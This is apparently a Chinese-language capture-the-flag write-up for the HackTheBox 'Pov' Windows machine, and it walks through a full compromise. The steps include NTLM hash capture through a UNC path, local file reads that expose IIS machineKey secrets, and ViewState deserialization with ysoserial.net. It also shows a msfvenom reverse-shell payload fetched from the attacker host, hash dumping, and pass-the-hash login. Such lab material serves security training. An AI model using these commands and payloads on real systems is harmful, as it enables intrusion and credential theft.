Pov - HackTheBox

基本信息

• https://app.hackthebox.com/machines/Pov
• 10.10.11.251

端口扫描

只有80:

$ nmap -sC -sV 10.10.11.251
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-29 13:20 CST
Nmap scan report for 10.10.11.251
Host is up (0.12s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.14 seconds

80

一个官网，可以得到域名pov.htb:

子域名扫描

添加hosts后扫描子域名可以发现dev：

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://pov.htb/" -H 'Host: FUZZ.pov.htb' -fs 12330

[Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 196ms]
    * FUZZ: dev

dev

同样添加hosts后访问，是另一个站点：

Download CV

dev中有个下载简历选项，使用file参数：

因为是windows机器，尝试直接使用unc路径，可以获取到hash，但破解不出来：

sudo python3 Responder.py -i 10.10.16.5 -v

file=\\10.10.16.5\test

[SMB] NTLMv2-SSP Client   : 10.10.11.251
[SMB] NTLMv2-SSP Username : POV\sfitz
[SMB] NTLMv2-SSP Hash     : sfitz::POV:1122334455667788:466D351CF4F865E0D080E2E08ED3A5E2:01010000000000000088313DB752DA013847A8DD446C2AA300000000020008003400380037004F0001001E00570049004E002D004700460033004C004600410041005000310037004B0004003400570049004E002D004700460033004C004600410041005000310037004B002E003400380037004F002E004C004F00430041004C00030014003400380037004F002E004C004F00430041004C00050014003400380037004F002E004C004F00430041004C00070008000088313DB752DA010600040002000000080030003000000000000000000000000020000002F935A0255AEA1FE55F5DF0B901DE9CAA05F369CCFCF4F5E55A95A7877938750A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0035000000000000000000

LFI

那可以尝试直接读取本地文件：

file=\\127.0.0.1\C$\Windows\System32\drivers\etc\hosts

后面就是常规读取配置文件，因为前面知道dev子域，所以对应读取：

• pentesting/web/payloads/lfi-rfi/lfi-windows-list.txt at master · MrW0l05zyn/pentesting
  https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/lfi-rfi/lfi-windows-list.txt

file=\\127.0.0.1\C$\inetpub\wwwroot\dev\web.config

配置文件中得到密钥

web.config

<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="default.aspx" />
    <httpRuntime targetFramework="4.5" />
    <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
  </system.web>
    <system.webServer>
        <httpErrors>
            <remove statusCode="403" subStatusCode="-1" />
            <error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
        </httpErrors>
        <httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
    </system.webServer>
</configuration>

VIEWSTATE反序列化

download cv请求中也可以看到VIEWSTATE，读取配置文件也可以得到对应密钥，常规的VIEWSTATE反序列化：

• Exploiting __VIEWSTATE knowing the secrets - HackTricks
  https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret
• pwntester/ysoserial.net: Deserialization payload generator for a variety of .NET formatters
  https://github.com/pwntester/ysoserial.net

.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe -nop -w hidden -e xxxxxx" --path="/portfolio/default.aspx" --apppath="default.aspx" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

生成结果，base64编码后，替换请求中的viewstate即可，得到sfitz：

connection.xml

sfitz的Documents中有个connection.xml,其中是alaading的加密密码，这个可以直接解密得到明文密码：

• Getting the Message in PowerShell - by Jeff Hicks
  https://jeffhicks.substack.com/p/getting-the-message-in-powershell

PS C:\Users\sfitz\Documents> $cred = Import-Clixml connection.xml
$cred = Import-Clixml connection.xml
PS C:\Users\sfitz\Documents> $cred.GetNetworkCredential().password
$cred.GetNetworkCredential().password
f8gQ8fynP44ek1m3

connection.xml

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
    </Props>
  </Obj>

user flag

使用得到的账号密码可以切换到alaading用户，桌面得到user flag：

# meterpreter有这个简单方式
meterpreter >run post/windows/manage/run_as_psh user=alaading pass=f8gQ8fynP44ek1m3

提权信息

可以看到alaading有SeDebugPrivilege现在是Disabled，因为当前shell上下文问题，直接runascs获取个meterpreter：

• antonioCoco/RunasCs: RunasCs - Csharp and open version of windows builtin runas.exe
  https://github.com/antonioCoco/RunasCs

msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe  LHOST=10.10.16.5 LPORT=4444 -o miao.exe
# powershell
wget http://10.10.16.5:7777/miao.exe -O miao.exe
wget http://10.10.16.5:7777/RunasCs.exe -O RunasCs.exe

.\RunasCs.exe alaading f8gQ8fynP44ek1m3 miao.exe

# 也可以直接通过msf runas然后再运行rev：
meterpreter >run post/windows/manage/run_as_psh user=alaading pass=f8gQ8fynP44ek1m3
C:\temp>miao.exe

hashdump

有sedebug就可以直接dump了：

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7c883121d0f63ee5b4312ba7572689b:::
alaading:1001:aad3b435b51404eeaad3b435b51404ee:31c0583909b8349cbe92961f9dfa5dbf:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sfitz:1000:aad3b435b51404eeaad3b435b51404ee:012e5ed95e8745ea5180f81648b6ec94:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1fa5b00b7c6cc4ac2807c4d5b3dd3dab:::

root flag

然后就简单的转发端口登录即可：

meterpreter > portfwd add -l 5985 -p 5985 -r 127.0.0.1

evil-winrm -i 127.0.0.1 -u Administrator -H f7c883121d0f63ee5b4312ba7572689b

参考资料

• pentesting/web/payloads/lfi-rfi/lfi-windows-list.txt at master · MrW0l05zyn/pentesting
  https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/lfi-rfi/lfi-windows-list.txt
• Exploiting __VIEWSTATE knowing the secrets - HackTricks
  https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret
• pwntester/ysoserial.net: Deserialization payload generator for a variety of .NET formatters
  https://github.com/pwntester/ysoserial.net
• Getting the Message in PowerShell - by Jeff Hicks
  https://jeffhicks.substack.com/p/getting-the-message-in-powershell
• antonioCoco/RunasCs: RunasCs - Csharp and open version of windows builtin runas.exe
  https://github.com/antonioCoco/RunasCs